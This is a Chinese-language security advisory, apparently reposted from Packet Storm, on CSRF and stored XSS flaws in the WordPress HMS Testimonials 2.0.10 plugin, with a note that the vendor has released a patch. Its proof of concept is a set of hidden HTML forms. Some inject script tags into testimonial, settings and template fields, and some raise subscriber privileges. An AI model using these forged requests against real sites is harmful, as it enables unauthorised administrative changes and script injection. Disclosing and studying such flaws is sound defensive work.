发布日期:2013-08-09
更新日期:2013-08-10受影响系统:
WordPress HMS Testimonials 2.0.10
描述:
--------------------------------------------------------------------------------
WordPress HMS Testimonials插件可在网页或帖子上显示客户的评价。WordPress HMS Testimonials的所有表单都受到CSRF漏洞的影响,可导致远程攻击者执行未授权数据库操作。<*来源:Jeff Kreitner
链接:http://packetstormsecurity.com/files/122761/WordPress-HMS-Testimonials-2.0.10-XSS-CSRF.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Proof of Concept
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
<input type="hidden" name="name" value="<script>alert("xss")</script>">
<input type="hidden" name="image" value="<script>alert("xss")</script>">
<input type="hidden" name="testimonial_date" value="08/08/2013">
<input type="hidden" name="url" value="<script>alert(String.fromCharCode(88,83,83))</script>">
<input type="hidden" name="testimonial" value="<script>alert("xss")</script>">
<input type="hidden" name="display" value="1">
<input type="submit" name="save" value="Save Testimonial">
</form>2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
<input type="hidden" name="name" value="New group">
<input type="submit" name="save" value="Save Group">
</form>3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
<input type="hidden" name="active_links_nofollow" value="1">
<input type="hidden" name="image_width" value="100">
<input type="hidden" name="image_height" value="100">
<input type="hidden" name="date_format" value="m/d/Y"><script>alert(3)</script>">
<input type="hidden" name="testimonial_container" value="div">
<input type="hidden" name="recaptcha_publickey" value="">
<input type="hidden" name="recaptcha_privatekey" value="">
<input type="submit" name="save" value="Save Settings (Default)">
</form>3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
<input type="hidden" name="moderator" value="subscriber">
<input type="hidden" name="roles" value="subscriber">
<input type="hidden" name="num_users_can_create" value="9999">
<input type="hidden" name="autoapprove" value="subscriber">
<input type="hidden" name="moderators_can_access_settings" value="1">
<input type="hidden" name="js_load" value="1">
<input type="hidden" name="roleorder[]" value="editor">
<input type="hidden" name="roleorder[]" value="author">
<input type="hidden" name="roleorder[]" value="contributor">
<input type="hidden" name="roleorder[]" value="subscriber">
<input type="submit" name="save" value="Save Settings (Advanced)">
</form>3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
<input type="hidden" name="name" value="xss">
<input type="hidden" name="type" value="textarea">
<input type="hidden" name="showonform" value="1">
<input type="submit" name="save" value="Save Settings (Custom Fields)">
</form>3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
<input type="hidden" name="name" value="New template<script>alert("xss")</script>">
<input type="hidden" name="item[]" value="system_id">
<input type="submit" name="save" value="Settings Templates (Save)">
</form>建议:
--------------------------------------------------------------------------------
厂商补丁:WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://wordpress.org/plugins/hms-testimonials/Firefox JavaScript远程代码执行漏洞(CVE-2013-1690)NetworkMiner 目录遍历和不安全库加载漏洞相关资讯 WordPress安全漏洞
Wordpress Lazy SEO插件Shell上传 (09/23/2013 18:12:26) WordPress Image Slider with (05/29/2013 19:27:42) WordPress WP Cleanfix 插件" (05/21/2013 19:36:23) WordPress crypt_private()远程拒 (06/30/2013 06:24:06) WordPress ProPlayer 插件"id"参数 (05/23/2013 20:13:32) WordPress wp-FileManager 插件 " (05/17/2013 20:21:08)
本文评论 查看全部评论 (0)
尊重网上道德,遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本
收藏该网址
易网时代-编程资源站